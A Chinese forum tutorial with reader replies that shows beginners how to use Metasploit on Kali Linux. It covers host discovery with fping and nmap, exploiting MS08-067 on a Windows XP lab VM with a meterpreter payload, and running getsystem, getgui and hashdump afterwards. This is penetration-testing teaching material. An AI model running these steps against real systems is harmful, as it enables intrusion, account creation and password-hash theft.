这里是无名君（来自猎奇吧的脑残外号，请无视），来给各新手带来kali linux常用工具的基本教程，还请高手多多指教。这里不仅仅是教程，我也打算作为工具的使用记录。仅作参考和日后借鉴学习。

先上图。。。秀下桌面（Ps：Lz也装过kali系统而且装过不止一遍，但是鼠标总是蛋疼的闪来闪去，最后网上找了半天才知道是内核显卡驱动问题，奈何Lz又没什么耐心折腾内核的编译，最后直接放弃了，因为在怎么美化都没用，鼠标就是那么蛋疼，眼睛看看的就想睡觉。。。）

今天来给大家分享metasploit工具，说是神器也不为过，但是说到底，神器也不是万能的。kali下面配置metasploit非常简单，因为你使用更新源，你连序列号都不用申请都可以正常升级metasploit，直接命令apt-get update|apt-get upgrade就行了，然后在终端中输入
service postgresql start
service metasploit start
msfconsole就ok了，第一次进入会自己自动配置链接数据库，等5分钟左右就好了。
上图

在这里说明一下，pro就是专业版的metasploit就是吧msfconsole的命令全部图形化，加了一点插件，操作方便了一些而已，并不影响exp的多少，再说了，msf的exp就那么几个，真的要实际干的话，还得去msf的官网和exploitdb上去找exp（或者大牛自己写）才行，说白了metasploit只不过是一个平台罢了。

这里介绍下比较有名的exp。因为说白了，msf里面的exp能派上用场的虽然不少，但大多数都是通过web服务，网页或者浏览器的漏洞来完成“任务”剩余的一些则是通过文件的方式，但是现在的安全软件也不是吃素的，arp劫持立马就被防住了，拿下web站点这种方法也是可行的，不过Lz才疏学浅，还得以后和大家一起学习。渗透吧对于拿站的教程不少，大家可以去那里学习一些知识。

今天任务非常简单，主要是讲解msf基本命令，通过对于漏洞MS08-067的使用来说明一下msf基本的命令。进入msf命令行之后，使用命令
use exploit/windows/smb/ms08_067_
neta
pi
来启动这个曾经威名远扬的smb服务的超级漏洞。启动后我们使用命令info来显示它的信息

可以看到对windowsxp sp3 chinese simplefide（NX）起作用，而我们的虚拟机环境正好是windows xp sp3.这里告诉大家一个小工具，可以探测存货主机的命令：fping
常用命令:fping -a -q -g（后面接ip段，比如192.168.0.1 192.168.0.255就是对于这一段ip的存活探测）可以输入fping --help来显示帮助命令。

我们可以通过nmap这款工具来获得存活ip的操作系统和其他的一些信息。这里就举一个例子

我们使用最简单的方法来完成：输入对方的ip地址，方法如下

选择目标操作系统，这里就是windowsxp sp3 chinese simplefide(NX)

选择payload，payload就是exp过后的命令方式，其中能力最强大的就是meterpreter。
设置过后再次使用show options，看到需要设置LHOST就是你本机的ip地址：

一切配置停当，使用命令run来exploit虚拟机：

可以看到成功的打开了会话，输入ps查看当前系统进程
使用migrate命令将meterpreter进程迁移：

经过一系列命令：getprivs getsystem（获得权限） run getgui -e（获得窗口管理权限） run hashdump（挖掘密码hash值）......

最后我们使用命令：shell来言简意赅地证明我们做过了什么：（要把字符编码设置为GBK）

顶顶顶

@xgnhack
申精，不是我

这个必须顶

顶楼主

楼主大好人～亲测